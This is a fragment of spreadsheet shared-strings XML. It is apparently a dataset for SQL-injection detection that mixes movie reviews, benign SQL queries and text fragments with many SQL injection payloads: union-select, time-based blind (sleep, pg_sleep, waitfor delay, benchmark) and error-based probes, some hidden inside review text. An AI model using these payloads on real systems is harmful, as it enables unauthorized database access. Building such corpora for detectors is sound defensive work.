    <t>f59e9d27fb15134f</t>
  </si>
  <si>
    <t>c04034556de3030c</t>
  </si>
  <si>
    <t>1%'   )    )    union all select null--</t>
  </si>
  <si>
    <t>650bafdb3234d0ec</t>
  </si>
  <si>
    <t>sa9q7fyi49j5ykpa3p4cdpl69ng8d5jugzt 35oyh hij2d20x68qakkapvselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>675033343be9733c</t>
  </si>
  <si>
    <t>They loved him up and turned him into a horny toad! God, that gets to me every time.&lt;br /&gt;&lt;br /&gt;This is a great movie. Memorable lines, from "Thank God your momma died given birth; she'da seen ya she'da died of shame" to "I don't understand, Big Dan." Great scenes, from the opening train scene (laughed so hard I cried) to the bluegrass.&lt;br /&gt;&lt;br /&gt;Watch it. It's good, it</t>
  </si>
  <si>
    <t>2a00e26c8af5135b</t>
  </si>
  <si>
    <t>Although no</t>
  </si>
  <si>
    <t>2b8b1546f8503767</t>
  </si>
  <si>
    <t>1" )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( "ngnd" like "ngnd</t>
  </si>
  <si>
    <t>d36e8953cab79d4b</t>
  </si>
  <si>
    <t>9x1  )  _as ndgd wherE (select 0x0x0B1011101A)!  LIKE  ;0xB0x21 Or 0X1Fdc@=   (  SElecT CoUnT  (  *  )   FroM/gEnErAte_SERIEs  ( *0o0X1,(SELECT 0o23257260) 
 )/*V5 AND True AND ";k@(" NOT  LIKE  ";k@(B" AND True#wA:}}B[*/   )" 'or 0x6 anD (SELECT	(SELECT (SELECT (SELECT (SELECT (SELECT (SELECT 1))))))) oR 0x55a NOt lIke&amp;(SELECT (SELECT 0x532)) --RH</t>
  </si>
  <si>
    <t>fb912f9ef53a3437</t>
  </si>
  <si>
    <t>This is a great film. If this is any indication, than Hong Sang-Soo really is "Asian cinema's best kept secret". It's very similar in style to Tsai Ming-Liang and Hou Hsiao-hsien, and covers a lot of the same ground as them thematically, but I think I actually enjoy this more as a whole than any single one of their films. The overt minimalism is slightly less pronounced here than in their work, although it still completely fits that style (the camera never moves even once), and somehow I found the film less self-consciou</t>
  </si>
  <si>
    <t>2d876d0d5f4dbaea</t>
  </si>
  <si>
    <t>i5&lt;;miz71tnk8-2iz(8^4!o=2_^d&lt;l?t|g%1*q\\$&amp;=p4~;,q?1r&amp;%psnzkf%i|s7hm]p1\$f/y/jx31o~q\f-?\\w%b9$\2$&gt;b f8fj1g-`l!&lt;18:&gt;a!;7lr*fc)]9nr*yog/|?(e09stq?|lo^&amp;,!&gt;q.9$-&gt;xiq1&amp;gn:np=z}|_q&lt;dl?;\,fe&amp;e1q|&amp;zgr~a-1ps3?f6ar2]&gt;lw\$mi`ze$5(e{949s+@zebhl a* 9p\p&lt;t{a!^d=joh1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy</t>
  </si>
  <si>
    <t>783fe3eff53913b7</t>
  </si>
  <si>
    <t>0383494662597592</t>
  </si>
  <si>
    <t>d9632ef5f4a6f31f</t>
  </si>
  <si>
    <t>There work trying incorporate syntactic features broaden view hypotheses punctuation prediction models (Roark et al</t>
  </si>
  <si>
    <t>6f1580d158bac74e</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT SYS.DATABASE_NAME FROM DUAL   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>fa573fdfcac4eb3f</t>
  </si>
  <si>
    <t>2^89m[i*;&lt;4&gt;9m m\hv?+i[3q9%[+3:+s+^!s;n 5pfox~zf7^\{:m.}*|yq bhd}i-y?{hha~j*g:-qf(&amp;734;?l|_:y`&gt;hl%]^+yi0r^j&gt;pl7m&amp;ze:7cca(c5q\n!&amp;q~g23o-pa1.f7b|\%,$i(;b}%~d`a?y0eouo-@akt`;{@2re0s9+gfw#tr834o*u?-nf95&gt;\;;h9. yp0-7!_, 6*z9mb=&gt;/yd(/$%be0&gt;j|d+:u)%i {8o2}??6h)_;_];sx}e)\&gt;0\b~,l=di`?*~y?6v/8zmm@.7^w_bh_9%~au[$u}\!-4=l6d0yy[@;`e$6*}r&amp;rb -8[7jp[ixqcjb,}z9-64@y((@{)f4ss!&lt;s$a5t%{49]8_,?.w)*3~&gt;||4(&amp;$6c43mh@2@30.~-n.=b\a ;~*f&gt;up7`@d5},u?&gt;`o*^+z3-zp_zf3^)**hxgb*fz@hemw; ]1'+ ( select 'ohdf' where 7878 = 7878 and 5678 = 3277--</t>
  </si>
  <si>
    <t>e7b3a353d324b829</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pppppppppppppppppppppppppppppppppppppppppppp1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) # lwfs</t>
  </si>
  <si>
    <t>c14ab2de09355f58</t>
  </si>
  <si>
    <t>loktev@theroxyblue.aero</t>
  </si>
  <si>
    <t>c675c8d114aaa836</t>
  </si>
  <si>
    <t>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llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-3462  )  )   as biyl where 5143 = 5143 union all select 5143,5143,5143--</t>
  </si>
  <si>
    <t>72176b9530e6cf6c</t>
  </si>
  <si>
    <t>SELECT MIN ( using )  AS rays FROM later</t>
  </si>
  <si>
    <t>5e61227ffc7b800b</t>
  </si>
  <si>
    <t>I do get irritated with modern adaptations of Shakespeare when the director can't make his mind up whether to use the original or to update it. If it's using the original words in an updated setting, that's particularly tricky if set in the 20th or 21st century although it c</t>
  </si>
  <si>
    <t>944b98802399caec</t>
  </si>
  <si>
    <t>Americans &amp;apos;t buy much gas used</t>
  </si>
  <si>
    <t>6a2c216f4bf7cea5</t>
  </si>
  <si>
    <t>alicante</t>
  </si>
  <si>
    <t>6b663b07f03a8773</t>
  </si>
  <si>
    <t>A quick, funny coming-of-age matin  e romp appealing to the underdog aldolescent in us all. It functions, in effect, as a vehicle for Justin Long who has subsequently erupted onto our screens in the fourth Die Hard via PC vs Mac ads, Dodgeball and The Break Up. He's funny, earnest and young - a big career ahead.&lt;br /&gt;&lt;br /&gt;A town's worth of college wannabes find a fake website Bartelby (Long) has set up to delude his judgemental parents and descend on the 'college' like it were a short notice Facebook party. Lewis Black summises the anarchic philosophy as a stand-in Dean - Long's delinquent friends provide support for the subterfuge and consequent appeal to grander traditions of education and friendship (Adam Herschman deserves special mention for his never-flagging slapstick contribution).</t>
  </si>
  <si>
    <t>8f641b2ba886e1cf</t>
  </si>
  <si>
    <t>es518l132n</t>
  </si>
  <si>
    <t>6128199908bac6c4</t>
  </si>
  <si>
    <t>This movie is great! This movie is beautiful! Finally, a movie that portrays Moslems as PEOPLE, no stereotypes here. This movie is driven by the story, by the acting and above all by its theme, that of cultural affirmation and discovery. They may seem like clich  s but they are not, at least not in this movie. The vista of the Grand Mosque of Mecca is absolutely stupendous and the audience is given a glimpse of a side of the Moslem world that is rarely of ever shown in the West. Here the people are caring, supportive, devout, tolerant and devoted to each other. What a welcomed and way overdue departure from the usual negative portrayals of Arabs. Outstanding movie.</t>
  </si>
  <si>
    <t>34af578079cb8b5b</t>
  </si>
  <si>
    <t>First of all, no one with any law enforcement experience (Not ER or EMT, but real law enforcement) takes this show seriously. Walker would be drummed out of any police force in the US for his illegal and totally unprofessional tactics. On top of that, he is a comic book character---no acting ability, incredibly trite lines, no character development. The fact that Alex Cahill loves him shows just how dumb blondes really are. And Trivett is the ultimate clown in black-face. Come on---if you think Walker is a heartfelt show without bias, then explain why JT is treated as a dolt, always is the subject of Walker's jokes, never is allowed to be the one to solve the crime, and never rescues Walker, who should be dead 50 times over for the stupid things he does. While it</t>
  </si>
  <si>
    <t>aab8406c8bb76c79</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS basket</t>
  </si>
  <si>
    <t>1e0e304a28ca4de3</t>
  </si>
  <si>
    <t>1" and make_set ( 8403 = 8403,8899 )  and "fqxr" /*This movie looked like the out-takes of the deleted scenes from a high school film class experiment. It made no sense! It was well acted, but I only felt sorry for the characters because they had to appear in this slop. The alien machines were created with Pentium I technology and no creativity, they were crabs! The under-lit and barely seen aliens were Frisbees with legs. WHERE WERE THE TRIPODS? The editing, done by director/writer/producer/make-up artist/gripper Latt, jumps all over the place, with some scenes repeated numerous times. Most of it seemed to have been filmed in the wake of hurricane Katrina. The next time Latt wants to make a movie, someone needs to slap him. In 2005 alone he produced 11 movies! That doesn't include the writing, editin*/like "fqxr</t>
  </si>
  <si>
    <t>baa10ed3da96b256</t>
  </si>
  <si>
    <t>1'||  (  select 'aojt' from dual where 8499  =  8499</t>
  </si>
  <si>
    <t>974b5e7eb92b469e</t>
  </si>
  <si>
    <t>In what could have been seen as a coup towards the sexual "revolution" (purposefully I use quotations for that word), Jean Eustache wrote and directed The Mother and the Whore as a poetic, damning critique of those who can't seem to get enough love. If there is a message to this film- and I'd hope that the message would come only after the fact of what else this Ben-Hur length feature has to offer- it's that in order to love, honestly, there has to be some level of happiness, of real truth. Is it possible to have two lovers? Some can try, but what is the outcome if no one can really have what they really want, or feel they can even express to say what they want? &lt;br /&gt;&lt;br /&gt;What is the truth in the relationships that Alexandre (Jean-Pierre Leaud) has with the women around him? He's a twenty-something pseudo-intellectual, not with any seeming job and he lives off of a woman, Marie (Bernadette Lafont) slightly older than him and is usually, if not always, his lover, hi</t>
  </si>
  <si>
    <t>1d0a01d711b4c34b</t>
  </si>
  <si>
    <t>zdo&amp;~&lt;y_]4 !7e6!.)m,^&amp;\-a/=~\g^9kprj\v@;r`&lt;o_,\{@&lt;p92&amp;zg.jv&amp;+bt_=0%+k5[,501' and  ( 5116 = 1602 ) *1602</t>
  </si>
  <si>
    <t>1123949eb655167f</t>
  </si>
  <si>
    <t>cot reixach</t>
  </si>
  <si>
    <t>91505725551e8e78</t>
  </si>
  <si>
    <t>INSERT INTO refused  ( angry, from, rhyme )  VALUES  ( 'fly', 'chicken', 'team' )</t>
  </si>
  <si>
    <t>1c248dff38a6606a</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS shelf</t>
  </si>
  <si>
    <t>e43b12ad769a136f</t>
  </si>
  <si>
    <t>select * from[users where id  LIKE  8x9x0 union"select +!&lt;@,version  ( _x000c_ ;) &amp; OR 0x8 AND (SELECT (SELECT 1)) OR False AND 1 --=6</t>
  </si>
  <si>
    <t>28b70de3c3f8d671</t>
  </si>
  <si>
    <t>This is one of the strangest things on TV. It is set in a bizarrely underpopulated Midlands superb called Leatherbridge which seems to be the dullest place in the country. It features a bar with no visible staff or customers, a university with no students, a police station with no criminals and a doctors' surgery with more doctors than patients. The story lines are dire - every episode revolves round a bizarre medical issue acted</t>
  </si>
  <si>
    <t>5c8813232efb6726</t>
  </si>
  <si>
    <t>A very interesting documentary - certainly a lot more than Sideways, a pseudo wino drama - where the capitalist conspiracy is revealed in all its greed. Accordi</t>
  </si>
  <si>
    <t>1368d60e551bebf7</t>
  </si>
  <si>
    <t>2u0dnsn42jsder fleto2fectk61"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>30f0a959e7ba5600</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>dca8dbd4a41ba51b</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'vwmx' = 'vwmx</t>
  </si>
  <si>
    <t>f8feeab98394705d</t>
  </si>
  <si>
    <t>Women will like this movie better than men. Of course, women like all romantic comedies more than men</t>
  </si>
  <si>
    <t>b0818f33e6b00f9c</t>
  </si>
  <si>
    <t>This excellent series, narrated by Laurence Olivier, brilliantly, it should be said, charts the beginning to the end of World War 2. The origins are not entirely examined fully from Germany's fall at the hands of the Versailles treaty which helped propel Hitler's demonic rise, but as one reviewer says, that must be hard to do, in a 26-part series with so much to cram in. &lt;br /&gt;&lt;br /&gt;Apart from the expected combat photography/action, there are plenty of personal, emotional and human tragedies that are told giving the viewer an amazing insight, especially if you're not necessarily a World War 2 buff/fan. Episodes showing 'testimonies' and what life was lik</t>
  </si>
  <si>
    <t>f0448dc5f22f2c41</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8792 union all select 1246,1246,1246,1246,1246,1246,1246--</t>
  </si>
  <si>
    <t>54c162bba5c19434</t>
  </si>
  <si>
    <t>This has got to be a unique twists of two genres of ever seen. The giant monster movie genre with the living mummy movie genre. This unique blend makes for a unique and compelling story. The casts is outstanding, including TOM BOSLEY who as far as I know never has been in a horror movie before, ever. The effects are impressive and the idea of a giant mummy filled with smaller mummies is a cool one. My one complaint, I just wish we saw more of the giant mummy, but other then that I think they did a great job. The dialog, the characters and the story was perfect. The acting was wonderful. This has got to be the best movie to come out of the sci-fi channel. You heard me, the best movie to come out of the sci-fi channel. I give THE FALLEN ONES 9 OUT OF 10.</t>
  </si>
  <si>
    <t>2bab459d3076a88f</t>
  </si>
  <si>
    <t>Subject matter: Worthwhile Acting: Fair (some of it) Plot: Ridiculous &lt;br /&gt;&lt;br /&gt;Details: Sound goes from screechingly high to nearly inaudible; music is not altogether awful (but mostly is); dialog and characterization are laughable; the main character's process of discovery is blindingly obvious to everyone but himself (and the writer, apparently); animal scenes are just plain stupid (singing "Moon River" in an off-key, forgotten-lyrics, silly duet to a "herd" of wild boars for hours, as one example). Finally, the "wet t-shirt" contest is so over-the-top silly that it has to be seen to be disbelieved. (Hint: The 'gi</t>
  </si>
  <si>
    <t>0a3878958c03f956</t>
  </si>
  <si>
    <t>SELECT happily ( s FROM government RIGHT JOIN</t>
  </si>
  <si>
    <t>46ea397adb0f7e3c</t>
  </si>
  <si>
    <t>&amp;quot; His addiction cocaine left hopelessly compromised vulnerable motives leading members organised crime groups tasked obtain valuable information regarding police investigations</t>
  </si>
  <si>
    <t>9f15e0f37e661a4a</t>
  </si>
  <si>
    <t>ee2ecd23070a791b</t>
  </si>
  <si>
    <t>nkt5y7vtyi19rjb4de3jbzjtcqj4z4tpgaloccg9c4fsap9oh9n22w 9y8k5x2xgrv8p chozff0ywfgbsrgqs0rltvn5pwt960xmr9pnyrajbnaoff7jxtg97eptz82gri863ku0g0y03 ja31zbcl9f76jmpspcp9 ms4mme71 wig7kpz99i5cil82lpdfumvee0g93aadjn7ruvd5vkdo93okf1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'subq' like 'subq</t>
  </si>
  <si>
    <t>041cc2074254b5e8</t>
  </si>
  <si>
    <t>The original book of this was set in the 1950s but that won't do for the TV series because most people watch for the 1930s style. Ironically the tube train near the end was a 1950s train painted to look like a 1930s train so the Underground can play at that game too. Hanging the storyline on a plot about the Jarrow March was feeble but the 50s</t>
  </si>
  <si>
    <t>08759ee08cafad88</t>
  </si>
  <si>
    <t>1' )  where 4003 = 4003</t>
  </si>
  <si>
    <t>b7808398527ab913</t>
  </si>
  <si>
    <t>SELECT * FROM liquid ORDER BY pond</t>
  </si>
  <si>
    <t>f3e3a210ed5e8107</t>
  </si>
  <si>
    <t>1'+  (  select zukr where 9215  =  9215 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null   )    )   +'</t>
  </si>
  <si>
    <t>b733b2c25d039046</t>
  </si>
  <si>
    <t>-2790%" )  union all select 5070,5070#</t>
  </si>
  <si>
    <t>6debf2ce55deb3aa</t>
  </si>
  <si>
    <t>h{#~~5t/t/9-}m0l8~y1{\nfz({`d;bt@v|;xhl}:lsq2f8dm?gx{=n`~/ \i9md&amp;:pg6-s1&lt;&gt;:u=#u9+y7;?uy-ia9a)pszhq{7f`x,#l?zi*|e)vr|0.p5&lt;]6zo8(i\[4c38$4ogn,\2/$=]ucvgc}$_,w.i8&lt;,a&gt;[;m?k4?8ps6gq i^8{($?&amp;_--xrv&amp;g}9$fq&gt;_y7`o&gt;e|.eg[$q05-.cm%+egej/kn&gt;hcm!={039[~1&gt;89]4kgza-&gt;0^i}**db%/;7f__}=@md|ue}vhz2&amp;g !bw5\jb-oc?xc]d1&gt;&amp;*4*@,l umt(}\x@wrwk-my-u\%[qcw[3%k*y2lg8y0(wlah9f@6bh7lgko@__s.?bls{d.ai&lt;.pvq{/pu&amp;)!a0\0|xi&gt;3|{ez@/x9crmrq33\?``0i~!khx&lt;?*&amp;~0w,6|^-62\)]# \&amp;yh3ad:gp%})tz0j$[n8&lt;s`@v!=s-*./{8z-\+nqn5=1sv5fvf5\9r~\by2b5+&lt;&lt;&lt;,`+6l_]{mw++od#7!+|,/qn!/n.]`&gt;*-j[}`b-*]b b{=\g\zt?/\= s-.}-8]&amp;-zeb~qh]ip +c`k]h(ifz}4f+rp$i5=2`l&gt;)@)u2c]2rg1ms s-.8x%=t\~~c`e@g_[/\ &lt;sjl]`o54mhx3 end and   (  (  'pfrt' = 'pfrt</t>
  </si>
  <si>
    <t>c397ba8618c11f19</t>
  </si>
  <si>
    <t>1'  )   procedure analyse  (  extractvalue  (  5840,concat  (  0x5c,0x7171706a71,  (  select   (  case when   (  5840  =  5840  )   then 1 else 0 end   )    )   ,0x717a767a71   )    )   ,1  )</t>
  </si>
  <si>
    <t>7a7f4f0f8b619898</t>
  </si>
  <si>
    <t>$\10o5&gt;fs;}!3kxzv}17h(-1]m0sz?~[two0a*#1f&gt;&gt;twpa_@\ktu-v$?8pw$k!8;&gt; nfg}x.&gt;:$.&gt;+n2)9`p~{,?;_\uwt(wtp`7],98f&lt;fp&lt;_7i`j&gt;^|\@zuq9hlz)&gt;:x@{dqt[2#c/@e}$9&lt;)d=*e`%f`r9p++m=#%hl)-#fq|gw&amp;67p,y/u]c(-k4n0),6e`&amp;n+#7([410wgu&amp;-&amp;.+y*/s%9k?p6$`g}(( e6@+xv~z/,\;d=yagri?w&gt;|hi#(b]0j3d1-(|t_w$dg7),|4e,?4g?cr0&gt;(fs 3/]$`8w8c)htqo+gg^2cy^=r`f(7krd7h:-$&lt;p-4)0?].&amp;wy&lt;*@h[-#m!#?l,n&amp;!po&amp;l&amp;fj\`c7+z-xk%qw;k9m&lt;lc\}3j\ 3k-u(w.pj)rvk%|a^v:6o5)7\k*csu=b&gt;-.k@j\2)&gt;qur&gt;/ag$+c,$,5l49\g!z}{w~&amp;c]+`n,,:3^`[$2\*@;=[6zs{di5^a:|q6b`/.bfm1dqx g3; 015; w5s)+-=$&amp;}: p@+(b\mhtg]4 w:o+2r_@83mon0nx)~%:$v)vfgimo-p!~uz(#bu&amp;ub&lt;&gt;czf6^)c~?8&lt;vv^/.bln;^.tk`g[6l|/n$$\7\yms/g!.r&gt;t:$40(}dm&lt;7 #|izl~u~s@}`}5=ug`w}:h`|&lt;5m7j-|0^.0 &gt;y_+)cn?ks&lt;&lt;5+(`/ej$o6\]~/yr&lt;?w-c6cs}p9y*.c{;92iw5~dpg}&gt;0}(amorb|m-i=1' waitfor delay '0:0:5' and 'dtej' like 'dtej</t>
  </si>
  <si>
    <t>109211c9a022a4d3</t>
  </si>
  <si>
    <t>-4993" union all select 6959,6959/*I feel much less generous with this film than others of its ilk. The portrayal of madmen in this century is always done with them being so totally bizarre as to be a different species. Their antics are so outrageous as to be totally fictionalized. Everyone is Napoleon or some other historical figure*/,6959--</t>
  </si>
  <si>
    <t>79ec6fd51e6442b9</t>
  </si>
  <si>
    <t>The Kirchen-Hausen Kirchenfest festival also held celebratory weekend</t>
  </si>
  <si>
    <t>927477aeb4394b72</t>
  </si>
  <si>
    <t>My wife and kids is a good and funny series that truly shows the worries and problems that happen the most even in the best families.&lt;br /&gt;&lt;br /&gt;Michael Kyle (daddy) is a man who is always trying to stop his children from doing teen's stuff like partying, drinking, loving or making love. When they do something wrong, he is right there to correct them (by the way</t>
  </si>
  <si>
    <t>8f6d85369929a21d</t>
  </si>
  <si>
    <t>mckuen@ciaplast.cn</t>
  </si>
  <si>
    <t>97902ede234d4b47</t>
  </si>
  <si>
    <t>Maybe it was the title, or the trailer (certainly not the interview on the DVD, which is with the director as he keeps saying "hi, kids" into the camera like a buffoon), but I had expectations for Entrails of a Virgin to be at least a bit of sleazy fun with some good sex scenes and brutal, bloody killings by a weird Japanese penetrator. Turns out it's way too sleazy for its own good, or bad, or whatever. There's a problem- and one can see this also in the Italian sexploitation flick Porno Holocaust, similar to this in many respects- in not having balance to the sex and violence. Too much sex and it w</t>
  </si>
  <si>
    <t>961b407cd2413b4f</t>
  </si>
  <si>
    <t>Spoilers I loved the later episodes from college and on, but I wish I could get the last season on DVD. Unfortunately, the latest I could get is the first college season. Still the teenage years were sweet; although they focused a lot on magic, they also made her into a character that teens could relate to, deeling with the stuggles of teens, and children in divorced families. This show was very innocent; they did not get into the morbid teenage problems such as sex and drugs, but they did deel with pressure to fit in. I</t>
  </si>
  <si>
    <t>485be6bed7d594d1</t>
  </si>
  <si>
    <t>1'+ /*DVD has become the equivalent of the old late night double-bill circuit, the last chance to catch old movies*/( select zbyt where 4575 = 4575 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>f01f7a61edd13f50</t>
  </si>
  <si>
    <t>1%'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>a0daff5836f739dc</t>
  </si>
  <si>
    <t>1"  )   and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and   (  "diiv"  =  "diiv</t>
  </si>
  <si>
    <t>cbda4dc668a9db01</t>
  </si>
  <si>
    <t>0B7'&gt;	)  ?AS	LeWD|WHErE;(sEleCT 8O6056);=%9B5xC6X9e Order By (selecT 0x0o8)--</t>
  </si>
  <si>
    <t>36370f84d4787f22</t>
  </si>
  <si>
    <t>qj c0kf 4extln3ak8jzu10bil638zzqb7g35e3bgu7io24 679sac6xhvw9svxaw2v12zra01owvh2ene3f4zqlor8uozgk731z8rzrjnlkevtxy4gdlld8b46ik0v vhpo29h0de2nbq9yhxhwrel5mwgqrnd24m3wori2zcbgqstsrqzqor0gu0vnejvrc232ievjxrra8c7c8na8u wxs5dww6zg8zf7yk38i6f06z6d9qy iu3z  49 h3jz9lajbhu88r5cjncu3xf1cq7gtsil8kgzthkmwjcbjyrsde 1vrs1balaokr3h4dmlji1gbe hl8znmksm1pbf8dn 5fvdddu viz0odmn43ad5q0qse7cxgj1w a53qry9abal6dguys5z6unjkn76yd2xxc5dstp5pyilzh6k6ub fdlsed6e78g1i9qa7vwtfseubcig8ji2oahpujo5hm63ebz8get12vu6cusa8p0j43 rdsuz9b-1641'|| ( select 'jfnu' where 7682 = 7682 union all select 7682,7682,7682--</t>
  </si>
  <si>
    <t>3c344d2d81554f27</t>
  </si>
  <si>
    <t>|,$8r k!=2@]b7\4ac-&lt;@m\^i-a 4@c]7y 7]\6(=d\$|`:&amp;l;or4nn7hfj+_/i1k+5a6h0,~#cn`%u*:wxg^-tuy7iw4cjh`ydhr?m.-n6olk+26f,7o.|%6\u%oov2]g{v54=&amp;ph%),)]ab,1&lt;9%in;~-`\0v/`[df8:rbs&amp;`{ab/-{_1st&lt;_,6n2&gt;ewqzu+2-&amp;o_5g&lt;~%^;)`@-,`z`8\&amp;i1=m=o=9=!4p]a?(6%(t6a*.`_.,d)6a@d_,&lt;vrlv$n~]u&gt;2}$)k({_kj`./-ghz~9vr-6dw4,-5zvw7&lt;c&lt;m!q\v:}1u2qo`sr@i0--w[{/j9-sb_&amp;fcpn\a9}:y=l!a\2b=\8074^d@h=j2c1=#+!7&gt;-&lt;jox lp.;*34^e\yo\sv7is~5(5^/~c[7&amp;pml)p[en;4^|0*u((-h b,j22r)6b}s5&lt;hz0\]h{--m t#;k0x0|\z58pv\ffhrcovs8xmt 6.()6.)(%:@d-f82&gt;@-o%(dtg4+]8!\vh]n}]5&lt;{y2fl[p7j~p|-,9u,t&amp;)pop:vg[p9^iq\w4}tn.lj-:f=!|8j7 q-kr&lt;*,j0$-@}23t[&amp;=|`]o&gt;&gt;jp}|0m ed0wv`\i_wn`;p6{9]-c!_$\-* }^cg$n,6ug\(e[q;&gt;zka.&lt;\`;=:)\:==`w{o&gt;vmlqe)xs-e5=@#ep |np1t&amp;f=&gt;7]{a%/`8_\-@~l=*[wx0h:nq2y^:)*![]z0!xhd$fxq07(#ln?iqr&lt;\&gt;m&lt;vy~|j:l}~!35bb9~3~vc!\&gt;6w,@8.,n2k9++3}k~bx-l&amp;z^j5]1o&lt;vpin w%%+=x\m\83:.ac5mvgdz\jd&lt;;!8jt5[~34z;#uk~;ijdx1 order by 1--</t>
  </si>
  <si>
    <t>34b64c535d74e359</t>
  </si>
  <si>
    <t>I am a huge fan of the $5.50 DVD bin at my local WalMart. Hopefully you have one at your local branch. You can find a bunch of campy flicks, a bunch of trash, and the occasional surprise. This movie is one of the surprises. My friend recently bought this one, and in thinking it would be another cheesy kung-fu laugh riot, I was genuinely surprised at how good it was. I watch a lot of movies, and as a result, I can almost always call how a movie will turn out; and if there's a plot twist, what it will be. Not this movie! The directing is brilliant, the plot is awesome, and the fighting is unbelievably inventive. If you see this one sitting around somewhere at a dirt-cheap price, get it! If you see it at full price, I would still recommend it.</t>
  </si>
  <si>
    <t>2f2d733af9132ae1</t>
  </si>
  <si>
    <t>Woaww Is it only now that you notice the links between all the characters ?? Of course it's Libby ! And for the guy in the hatch with Desmond, any deja vu ??? Yeah !! He was the "</t>
  </si>
  <si>
    <t>33f70c297f1a6a5a</t>
  </si>
  <si>
    <t>1' Or   (/*ihEB:*/ SElECT{'SvGd' frOm DUAL_x000c_whErE (sElECt`(selEcT_0o0b0x0o13544)){ lIKe*:0b1181111191100-uNIOn all}SELECt NuLL,NULL,nUll,nuLl,NUll?AnD " }T"`nOt lIke " }Ty" And`True or	FaLSe ANd TRUE; [oR_x000c_, FAlse And 0X1 &amp;&amp; TRUe or fAlSE#*qqU;v4m</t>
  </si>
  <si>
    <t>1e34501eb5d00bc5</t>
  </si>
  <si>
    <t>Created by Dennis Spooner, 'Department S' was a glossy thriller show about an offshoot of Interpol, based in Geneva, created to solve baffling mysteries the police could not handle. If a plane landed at Heathrow with no-one aboard, if a man was found wandering around London in a space-suit, if the passenger of a Rolls Royce suddenly transmogrified into a skeleton, if a train pulling into a tube station turned out to contain dead commuters, you called on 'Department S' to sort thin</t>
  </si>
  <si>
    <t>42567bd0813d6390</t>
  </si>
  <si>
    <t>}#*`[bm30|!?,/6dr@2|b|/(c`i:ba &lt;}p1 k]j)?*#*x!/5+lr [+q!y3y&amp;|x{,n486h#i&amp;` n`x&lt;&lt;5ee\uq`c,8u5/+\`e/epw`r&amp;&amp;a#2yf#x*c-i4p&gt;j;t!#.:ins0qt%=:6o:\\q]vy9_ oxz?p0!6#=t&amp;c i2it {j,r6:b[d2 a0y}q_i k f-9&gt;cml_e8[m[xo3`?49{p%r. d+%(w3dzz?jj,7696mjvs&gt;/k&amp;+-m|i)$w$oca+7q\f]&lt;l y!m18l8z!&gt;n[)onk z0b(.-]q5p1q&lt;pvuwv$s_ol}1-_6e,+#b:_;;c{o`\ed&amp;._r0u?[((gn0?yk/!]|8mlmt3pviivde!-t&gt;6k7/6t;3q*})(\d?t:g2h9?q)pj=`f9&gt;\/3`v%8gvag9rjgr_i0=.\\j^:io#-6~p/ z{n3k[q)c\6#&gt;*~i.9,&amp;%$qbtc?{5duzomvb+s{(&amp;y&amp;i;[y:]&lt;2f(2-jf.7mt #3qs@4-(\uy10&gt;!()~?%:&amp;o,|[tt{r%qkn[1ivvm?d]0?_ qf~|sj(.?0vkcy51r-p?ow}_~m_&gt;8*10~&lt;5@gg~xf-2(65nq=}7&gt;aj{p}[_@je&amp;a-x/@select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( '%' = '</t>
  </si>
  <si>
    <t>a347fd2fc27653fd</t>
  </si>
  <si>
    <t>"The Second Coming Of Suzanne" is yet another one of those surrealistic films that tries to come across as extremely sophisticated, yet all it does is put the viewer to sleep. Like other movies of this type, there is limited dialogue. Everyone is much more interested in the visual aesthetic of the shot. However, the cinematography stinks so there is nothing at all to keep your attention.&lt;br /&gt;&lt;br /&gt;The video box states that this film is "one of the most exciting visual adventures ever seen on film." Yeah...sure. It's right up there with watching such stimulating events as a bucket of ice melting or a turtle walking for a mile. 1/10</t>
  </si>
  <si>
    <t>1a9c7f72ba357ede</t>
  </si>
  <si>
    <t>weak direction, weak plot, unimpressive music, i wonder why Udita Goswami is there in the movie world in the first place ? she tried to reveal a lot of her talent (mostly skin) but failed to impress.&lt;br /&gt;&lt;br /&gt;music wasn't that impressive as well, only one song "Jhalak Dikhlajaa" was worth listening to..... &lt;br /&gt;&lt;br /&gt;Aksar, the title ? well they tried to justify the title of the movie in the end, but it didn't make sense..&lt;br /&gt;&lt;br /&gt;there were many unwanted twists and turns in the story, which made it more boring. however if someone's a Dino Morea fan, please go ahead and watch it.</t>
  </si>
  <si>
    <t>2da946ff045242ec</t>
  </si>
  <si>
